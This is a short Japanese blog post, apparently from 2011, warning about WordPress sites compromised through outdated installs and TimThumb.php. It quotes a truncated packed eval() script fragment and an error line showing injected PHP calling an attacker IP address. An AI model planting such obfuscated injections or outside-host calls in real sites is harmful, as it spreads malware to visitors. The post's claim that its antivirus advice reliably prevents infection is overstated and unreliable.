WordPress改ざん「script eval function(p,a,c,k,e,d)e function c」攻撃
 
ブログ構築システム WordPress の脆弱性(導入してるバージョンが古い)と、テーマやプラグインに採用されてる画像リサイズPHPコード TimThumb.php の脆弱性を悪用してブログを改ざんする攻撃が増加してるみたいです。
 
日本でも改ざんされてしまい、不正な攻撃コードを挿入され、アクセスしてきたユーザーにウイルス・マルウェアをバラ撒いちゃってるブログを複数あり?
■ /tmp/wp_inc or Not Your Typical WordPress Attack | Unmask Parasites. Blog.
http://blog.unmaskparasites.com/2011/11/09/tmpwp_inc-or-not-your-typical-wordpress-attack/
 
■ StopTheHacker | nl.ai p,a,c,k,e,d Malware
https://www.stopthehacker.com/2011/11/07/nl-ai-packed-malware/
 
■ WordPressを利用したWebサイトへの改ざん攻撃の増加 Tokyo SOC Report
https://www-304.ibm.com/connections/blogs/tokyo-soc/entry/wordpress_injection_20111115?lang=ja_jp

『eval(function(p,a,c,k,e,d) ~』のJavaScript処理は、JavaScriptコードを難読化する汎用ツール「Dean Edwards' Javascript Packer」由来のもので、正規の場面でも使われてます。

<script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){ ~ ~ ~ ~ </script>

> Fatal error:  Cannot redeclare _765258526() (previously declared in ~
> Warning:  file_get_contents(http // 91.196.216.30 / bt.php?ip= ~

セキュリティソフトが必ずしもサッパリ対処してくれない、コチラのウイルス対策を済ませておくことで、運悪く改ざん被害を受けてるブログを踏んでしまっても、ウイルス感染被害の確実な回避ができます、ハイ!
関連するブログ記事
・ tag5479347351 tag1.php iframeサイト改ざんハッキング被害